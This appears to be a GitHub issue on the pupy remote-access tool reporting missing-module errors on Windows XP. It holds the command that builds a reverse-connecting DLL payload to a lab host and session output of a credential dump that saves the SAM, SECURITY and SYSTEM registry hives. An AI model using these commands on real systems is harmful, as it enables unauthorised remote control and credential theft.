### ISSUE TITLE
Reflective DLL - modules absence?

### ISSUE THREAD

**Issue by alxchk** [n1nj4sec/pupy#153]
Payload generated using next command:
```./pupygen.py -f dll_x86 -o pupy.dll connect --host 192.168.57.1:443```

```
>> run get_info 
hostname  : loh-b93fc38b301
user      : No module named pwd <<------- ??
release   : XP
version   : 5.1.2600
os_arch   : x86
proc_arch : 32bit
pid       : 1048
exec_path : C:\WINDOWS\System32\svchost.exe
address   : ::ffff:192.168.57.101
macaddr   : 08:00:27:2C:79:7B
uac_lvl   : ?
intgty_lvl: ?
transport : ssl
launcher  : connect
launcher_args: ['--host', '192.168.57.1:443']
```

```
>> run admin/ps
[-] cannot import name _common

========= Remote Traceback (1) =========
Traceback (most recent call last):
  File "C:\Python27\Lib\site-packages\rpyc\core\protocol.py", line 305, in _dispatch_request
  File "C:\Python27\Lib\site-packages\rpyc\core\protocol.py", line 547, in _handle_callattr
  File "C:\Python27\Lib\site-packages\rpyc\core\service.py", line 118, in __getitem__
  File "<string>", line 98, in exposed_getmodule
  File "<string>", line 110, in load_module
ImportError: cannot import name _common
```

```
>> run getpid
[-] cannot import name _common

========= Remote Traceback (1) =========
Traceback (most recent call last):
  File "C:\Python27\Lib\site-packages\rpyc\core\protocol.py", line 305, in _dispatch_request
  File "C:\Python27\Lib\site-packages\rpyc\core\protocol.py", line 547, in _handle_callattr
  File "C:\Python27\Lib\site-packages\rpyc\core\service.py", line 118, in __getitem__
  File "<string>", line 98, in exposed_getmodule
  File "<string>", line 110, in load_module
ImportError: cannot import name _common
```

```
>> run creddump 
[+] saving SYSTEM hives in %TEMP%...
[%] running reg save HKLM\SYSTEM %TEMP%/SYSTEM /y...

Error:  Too many command-line parameters
[%] running reg save HKLM\SECURITY %TEMP%/SECURITY /y...

Error:  Too many command-line parameters
[%] running reg save HKLM\SAM %TEMP%/SAM /y...

Error:  Too many command-line parameters
[+] hives saved!
[%] downloading SYSTEM hive...
[-] cannot download 'C:\\WINDOWS\\TEMP\\SYSTEM'
```

.. and so on

**Comment by alxchk** [comment]
With standalone binary the same story:
```
>> info
hostname  : loh-b93fc38b301
user      : vasily
release   : XP
version   : 5.1.2600
os_arch   : x86
proc_arch : 32bit
pid       : 1240
exec_path : C:\Documents and Settings\vasily\Desktop\pupy.exe
address   : ::ffff:192.168.57.101
macaddr   : 08:00:27:2C:79:7B
uac_lvl   : ?
intgty_lvl: ?
transport : ssl
launcher  : connect
launcher_args: ['--host', '192.168.57.1:443']
>> ps
[-] cannot import name _common

========= Remote Traceback (1) =========
Traceback (most recent call last):
  File "C:\Python27\Lib\site-packages\rpyc\core\protocol.py", line 305, in _dispatch_request
  File "C:\Python27\Lib\site-packages\rpyc\core\protocol.py", line 547, in _handle_callattr
  File "C:\Python27\Lib\site-packages\rpyc\core\service.py", line 118, in __getitem__
  File "<string>", line 100, in exposed_getmodule
  File "<string>", line 110, in load_module
ImportError: cannot import name _common
>>
```

**Comment by alxchk** [comment]
Ok, looks like it happens on Windows XP (SP2?). On Windows 10 there is no such problem.
